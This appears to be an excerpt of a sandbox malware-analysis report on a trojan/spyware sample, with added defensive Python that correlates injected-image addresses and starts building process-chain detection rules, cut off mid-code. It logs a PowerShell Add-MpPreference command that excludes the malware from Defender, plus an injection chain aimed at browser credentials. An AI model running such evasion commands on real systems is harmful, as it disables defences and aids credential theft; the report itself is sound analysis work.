                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_0106A118
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01058158
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_010901AA
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_010841A2
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_010881CC
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01062000
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00FC0100
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_0108A352
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_010903E6
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00FDE3F0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_010502C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01090591
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01074420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01082446
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00FD0535
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_0107E4F6
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00FEC6E0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00FCC7C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00FF4750
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00FFE8F0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00FB68B8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0109A9A64_2_0109A9A6
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD28404_2_00FD2840
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FDA8404_2_00FDA840
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD29A04_2_00FD29A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE69624_2_00FE6962
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108AB404_2_0108AB40
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCEA804_2_00FCEA80
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01086BD74_2_01086BD7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC0CF24_2_00FC0CF2
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106CD1F4_2_0106CD1F
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0C004_2_00FD0C00
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCADE04_2_00FCADE0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE8DBF4_2_00FE8DBF
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070CB54_2_01070CB5
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FDAD004_2_00FDAD00
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01012F284_2_01012F28
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01072F304_2_01072F30
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01044F404_2_01044F40
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE2E904_2_00FE2E90
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0E594_2_00FD0E59
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104EFA04_2_0104EFA0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108EE264_2_0108EE26
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC2FC84_2_00FC2FC8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108CE934_2_0108CE93
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF0F304_2_00FF0F30
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108EEDB4_2_0108EEDB
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD70C04_2_00FD70C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0109B16B4_2_0109B16B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0100516C4_2_0100516C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FDB1B04_2_00FDB1B0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBF1724_2_00FBF172
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0107F0CC4_2_0107F0CC
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010870E94_2_010870E9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108F0E04_2_0108F0E0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FED2F04_2_00FED2F0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108132D4_2_0108132D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEB2C04_2_00FEB2C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD52A04_2_00FD52A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0101739A4_2_0101739A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBD34C4_2_00FBD34C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010712ED4_2_010712ED
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010875714_2_01087571
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC14604_2_00FC1460
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106D5B04_2_0106D5B0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010995C34_2_010995C3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108F43F4_2_0108F43F
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108F7B04_2_0108F7B0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010156304_2_01015630
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010816CC4_2_010816CC
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010659104_2_01065910
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD38E04_2_00FD38E0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103D8004_2_0103D800
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD99504_2_00FD9950
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEB9504_2_00FEB950
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108FB764_2_0108FB76
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01045BF04_2_01045BF0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0100DBF94_2_0100DBF9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108FA494_2_0108FA49
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01087A464_2_01087A46
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01043A6C4_2_01043A6C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEFB804_2_00FEFB80
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01015AA04_2_01015AA0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01071AA34_2_01071AA3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106DAAC4_2_0106DAAC
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0107DAC64_2_0107DAC6
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01081D5A4_2_01081D5A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01087D734_2_01087D73
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01049C324_2_01049C32
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEFDC04_2_00FEFDC0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD3D404_2_00FD3D40
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108FCF24_2_0108FCF2
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108FF094_2_0108FF09
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD9EB04_2_00FD9EB0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108FFB14_2_0108FFB1
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD1F924_2_00FD1F92
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035AA352
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035B03E6
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034FE3F0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03590274
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035702C0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03578158
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0358A118
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034E0100
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035A81CC
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035B01AA
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035A41A2
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03582000
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03514750
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034F0770
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034EC7C0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0350C6E0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034F0535
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035B0591
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035A2446
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03594420
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0359E4F6
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035AAB40
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035A6BD7
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034EEA80
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03506962
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034F29A0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035BA9A6
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034F2840
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034FA840
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0351E8F0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034D68B8
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03564F40
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03510F30
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03592F30
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03532F28
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034E2FC8
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0356EFA0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034F0E59
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035AEE26
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035AEEDB
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03502E90
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035ACE93
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0358CD1F
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034FAD00
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034EADE0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03508DBF
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034F0C00
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034E0CF2
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03590CB5
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034DD34C
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035A132D
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0353739A
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0350B2C0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0350D2F0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035912ED
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034F52A0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035BB16B
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0352516C
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034DF172
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034FB1B0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034F70C0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0359F0CC
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035A70E9
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035AF0E0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035AF7B0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03535630
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035A16CC
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035A7571
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0358D5B0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034E1460
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035AF43F
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035AFB76
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03565BF0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0352DBF9
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0350FB80
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035AFA49
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035A7A46
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03563A6C
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0359DAC6
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03535AA0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0358DAAC
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03591AA3
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0350B950
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034F9950
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03585910
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0355D800
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034F38E0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035AFF09
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034B3FD2
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034B3FD5
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034F1F92
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035AFFB1
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034F9EB0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035A1D5A
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_034F3D40
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035A7D73
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_0350FDC0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03569C32
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035AFCF2
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009B20C0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009B87A0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009C2570
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009ACFB0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009ACFA8
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009AB1B0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009AD1D0
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009AB300
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009B5790
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009B3990
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009CBF30
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_032EE328
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_032EE7DC
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_032EE443
Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_032ED8A8
Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 03537E54 appears 99 times
Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 0356F290 appears 103 times
Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 034DB970 appears 262 times
Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 0355EA12 appears 86 times
Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 03525130 appears 58 times
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: String function: 0104F290 appears 103 times
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: String function: 01017E54 appears 107 times
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: String function: 00FBB970 appears 262 times
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: String function: 0103EA12 appears 86 times
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: String function: 01005130 appears 58 times
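The two function lists above are worth reading side by side: the 0x00FB...-0x0109... addresses found in the re-launched QmBbqpEHu0.exe (PID 4) and the 0x034D...-0x035B... addresses found in finger.exe (PID 10) differ by a constant, and the five "String function" entries line up the same way, which is what you expect when one unpacked payload image is mapped into both processes at different bases. The 0x004... addresses in PID 4 (the sample's own 32-bit image at its default base) and the 0x009B.../0x032E... addresses in finger.exe have no counterpart and so are not part of that shared image. The Python below is an added example, not part of the Joe Sandbox report, that recovers the relocation delta from a constructed subset of the report's addresses and partitions them accordingly; it also pairs the string-function entries and reports the one whose call count differs (107 vs 99) rather than hiding it.

```python
from collections import Counter

# Constructed subset of the "Code function: <pid>_<round>_<address>" entries
# listed in this report.  PID 4 is the re-launched QmBbqpEHu0.exe, PID 10 is
# finger.exe.  The report lists many more; these were copied as-is.
PID4_FUNCS = """
4_2_00418C33 4_2_004029E0 4_2_0042F3D3
4_2_0106A118 4_2_01058158 4_2_010901AA 4_2_00FC0100 4_2_0108A352
4_2_010903E6 4_2_00FDE3F0 4_2_01070274 4_2_010502C0 4_2_00FD0535
4_2_00FCC7C0 4_2_01012F28 4_2_0108FCF2
""".split()

PID10_FUNCS = """
10_2_035AA352 10_2_035B03E6 10_2_034FE3F0 10_2_03590274 10_2_035702C0
10_2_03578158 10_2_0358A118 10_2_034E0100 10_2_035B01AA 10_2_034F0535
10_2_034EC7C0 10_2_03532F28 10_2_035AFCF2
10_2_009B20C0 10_2_009B87A0 10_2_032EE328 10_2_032EE7DC
""".split()

# The "String function: <address> appears N times" entries, same two processes.
PID4_STRFUNCS = {0x0104F290: 103, 0x01017E54: 107, 0x00FBB970: 262,
                 0x0103EA12: 86, 0x01005130: 58}
PID10_STRFUNCS = {0x03537E54: 99, 0x0356F290: 103, 0x034DB970: 262,
                  0x0355EA12: 86, 0x03525130: 58}


def parse_addr(entry):
    """'4_2_0106A118' -> 0x0106A118; the PID and analysis-round prefix is dropped."""
    return int(entry.rsplit("_", 1)[1], 16)


def find_relocation_delta(src, dst, min_votes=3):
    """Most common (dst - src) difference over all address pairs.

    If one image is mapped in both processes, every function in it votes for
    the same delta while unrelated addresses scatter.  Returns None when no
    delta collects at least min_votes, i.e. no shared image is evident.
    """
    votes = Counter(d - s for s in src for d in dst)
    delta, count = votes.most_common(1)[0]
    return delta if count >= min_votes else None


def split_by_delta(src, dst, delta):
    """Partition src into addresses that have a counterpart at src+delta in dst
    and those that do not (sorted for stable output)."""
    dst_set = set(dst)
    shared = sorted(a for a in src if a + delta in dst_set)
    own = sorted(a for a in src if a + delta not in dst_set)
    return shared, own


def compare_string_functions(src_counts, dst_counts, delta):
    """Pair string-function entries through the delta; yields
    (src_addr, dst_addr, src_count, dst_count) for every pair found."""
    pairs = []
    for a, n in sorted(src_counts.items()):
        b = a + delta
        if b in dst_counts:
            pairs.append((a, b, n, dst_counts[b]))
    return pairs


def analyze():
    src = [parse_addr(e) for e in PID4_FUNCS]
    dst = [parse_addr(e) for e in PID10_FUNCS]
    delta = find_relocation_delta(src, dst)
    if delta is None:
        return {"delta": None}
    shared, own = split_by_delta(src, dst, delta)
    # finger.exe addresses that the shared image does not account for.
    leftover = sorted(set(dst) - {a + delta for a in shared})
    return {
        "delta": delta,
        "shared": shared,
        "pid4_only": own,
        "pid10_only": leftover,
        "string_funcs": compare_string_functions(PID4_STRFUNCS, PID10_STRFUNCS, delta),
    }


if __name__ == "__main__":
    r = analyze()
    print(f"relocation delta: {r['delta']:#010x}")
    print("shared image functions (PID 4 address -> PID 10 address):")
    for a in r["shared"]:
        print(f"  {a:#010x} -> {a + r['delta']:#010x}")
    print("PID 4 only:", [f"{a:#010x}" for a in r["pid4_only"]])
    print("PID 10 only:", [f"{a:#010x}" for a in r["pid10_only"]])
    for a, b, n, m in r["string_funcs"]:
        flag = "" if n == m else "  (count differs)"
        print(f"  string function {a:#010x} -> {b:#010x}: {n} vs {m} calls{flag}")
```

Run on the subset above the delta comes out as 0x02520000 with thirteen votes, leaving only the three 0x004... entries on the PID 4 side and the four 0x009B.../0x032E... entries on the finger.exe side unexplained. The same voting trick works on any pair of per-process function lists from a sandbox report, and the vote count is a quick confidence measure: a delta supported by one or two pairs is coincidence, one supported by dozens is an injected image.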
Source: QmBbqpEHu0.exe, 00000000.00000002.3597509427.0000000003941000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs QmBbqpEHu0.exe
Source: QmBbqpEHu0.exe, 00000000.00000000.1729638967.0000000000482000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameHszP.exe: vs QmBbqpEHu0.exe
Source: QmBbqpEHu0.exe, 00000000.00000002.3617403660.0000000008CC0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs QmBbqpEHu0.exe
Source: QmBbqpEHu0.exe, 00000000.00000002.3615688071.0000000007410000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs QmBbqpEHu0.exe
Source: QmBbqpEHu0.exe, 00000000.00000002.3587047984.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs QmBbqpEHu0.exe
Source: QmBbqpEHu0.exe, 00000004.00000002.2285918657.00000000010BD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs QmBbqpEHu0.exe
Source: QmBbqpEHu0.exe, 00000004.00000002.2285714883.00000000009B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamefinger.exej% vs QmBbqpEHu0.exe
Source: QmBbqpEHu0.exe | Binary or memory string: OriginalFilenameHszP.exe: vs QmBbqpEHu0.exe
Source: QmBbqpEHu0.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: QmBbqpEHu0.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@11/7@11/6
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QmBbqpEHu0.exe.log
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2g0rrok.24y.ps1
Source: QmBbqpEHu0.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: finger.exe, 0000000A.00000002.3586685335.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000003.2479557008.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000003.2480938314.0000000000E95000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: QmBbqpEHu0.exe | ReversingLabs: Detection: 78%
Source: QmBbqpEHu0.exe | Virustotal: Detection: 63%
Source: unknown | Process created: C:\Users\user\Desktop\QmBbqpEHu0.exe "C:\Users\user\Desktop\QmBbqpEHu0.exe"
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe"
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Process created: C:\Users\user\Desktop\QmBbqpEHu0.exe "C:\Users\user\Desktop\QmBbqpEHu0.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
Source: C:\Windows\SysWOW64\finger.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
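The "Process created" lines above are the whole execution chain in a handful of events: the sample starts PowerShell to exclude its own path from Defender, relaunches an identical copy of itself (the suspended child that the injection signatures refer to), an executable with a random-looking name under Program Files (x86) starts the SysWOW64 utility finger.exe, and finger.exe then starts Firefox. Each of those steps is a detectable parent/child relationship on its own. The Python below is an added example, not part of the Joe Sandbox report, that turns them into four rules and runs them over process-creation events constructed from the lines above; the shell and browser allowlists are assumptions to tune per environment, and an Add-MpPreference hidden behind -EncodedCommand would have to be base64-decoded before the first rule can see it.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # image path of the creating process
    child: str    # image path of the created process
    cmdline: str  # command line of the created process


# Constructed from the "Process created" lines of this report, in order.
EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\QmBbqpEHu0.exe",
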